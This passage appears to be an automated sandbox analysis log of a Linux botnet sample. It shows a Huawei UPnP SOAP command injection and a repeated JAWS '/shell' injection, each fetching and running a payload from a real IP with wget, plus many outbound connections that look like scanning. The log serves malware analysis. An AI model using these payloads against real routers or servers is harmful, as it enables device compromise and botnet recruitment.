3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: /tmp/s8y4CBbFHW.elf (PID: 5432)Socket: 127.0.0.1:46157Jump to behavior
              Source: unknownTCP traffic detected without corresponding DNS query: 96.177.106.95
              Source: unknownTCP traffic detected without corresponding DNS query: 173.87.116.193
              Source: unknownTCP traffic detected without corresponding DNS query: 135.237.201.13
              Source: unknownTCP traffic detected without corresponding DNS query: 51.4.201.163
              Source: unknownTCP traffic detected without corresponding DNS query: 125.212.207.230
              Source: unknownTCP traffic detected without corresponding DNS query: 32.204.162.123
              Source: unknownTCP traffic detected without corresponding DNS query: 213.79.9.22
              Source: unknownTCP traffic detected without corresponding DNS query: 107.185.45.46
              Source: unknownTCP traffic detected without corresponding DNS query: 114.149.158.173
              Source: unknownTCP traffic detected without corresponding DNS query: 68.161.203.180
              Source: unknownTCP traffic detected without corresponding DNS query: 132.215.221.250
              Source: unknownTCP traffic detected without corresponding DNS query: 146.77.88.171
              Source: unknownTCP traffic detected without corresponding DNS query: 218.209.158.189
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.89.22
              Source: unknownTCP traffic detected without corresponding DNS query: 222.55.142.174
              Source: unknownTCP traffic detected without corresponding DNS query: 87.202.96.40
              Source: unknownTCP traffic detected without corresponding DNS query: 186.246.195.187
              Source: unknownTCP traffic detected without corresponding DNS query: 93.190.24.11
              Source: unknownTCP traffic detected without corresponding DNS query: 163.160.54.54
              Source: unknownTCP traffic detected without corresponding DNS query: 172.136.165.150
              Source: unknownTCP traffic detected without corresponding DNS query: 32.199.108.90
              Source: unknownTCP traffic detected without corresponding DNS query: 181.116.62.108
              Source: unknownTCP traffic detected without corresponding DNS query: 50.0.195.92
              Source: unknownTCP traffic detected without corresponding DNS query: 164.60.105.204
              Source: unknownTCP traffic detected without corresponding DNS query: 144.47.107.187
              Source: unknownTCP traffic detected without corresponding DNS query: 101.0.241.188
              Source: unknownTCP traffic detected without corresponding DNS query: 45.211.194.205
              Source: unknownTCP traffic detected without corresponding DNS query: 122.156.84.221
              Source: unknownTCP traffic detected without corresponding DNS query: 79.64.51.144
              Source: unknownTCP traffic detected without corresponding DNS query: 4.146.12.76
              Source: unknownTCP traffic detected without corresponding DNS query: 91.118.235.84
              Source: unknownTCP traffic detected without corresponding DNS query: 117.7.158.134
              Source: unknownTCP traffic detected without corresponding DNS query: 153.63.20.187
              Source: unknownTCP traffic detected without corresponding DNS query: 18.63.185.184
              Source: unknownTCP traffic detected without corresponding DNS query: 72.115.76.96
              Source: unknownTCP traffic detected without corresponding DNS query: 174.41.100.150
              Source: unknownTCP traffic detected without corresponding DNS query: 52.34.186.234
              Source: unknownTCP traffic detected without corresponding DNS query: 174.5.116.14
              Source: unknownTCP traffic detected without corresponding DNS query: 112.8.190.180
              Source: unknownTCP traffic detected without corresponding DNS query: 118.103.225.24
              Source: unknownTCP traffic detected without corresponding DNS query: 17.149.191.92
              Source: unknownTCP traffic detected without corresponding DNS query: 205.253.14.196
              Source: unknownTCP traffic detected without corresponding DNS query: 101.64.143.75
              Source: unknownTCP traffic detected without corresponding DNS query: 105.66.169.159
              Source: unknownTCP traffic detected without corresponding DNS query: 150.168.58.113
              Source: unknownTCP traffic detected without corresponding DNS query: 99.177.223.89
              Source: unknownTCP traffic detected without corresponding DNS query: 197.107.167.28
              Source: unknownTCP traffic detected without corresponding DNS query: 93.133.135.212
              Source: unknownTCP traffic detected without corresponding DNS query: 130.32.142.3
              Source: unknownTCP traffic detected without corresponding DNS query: 194.114.95.197
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
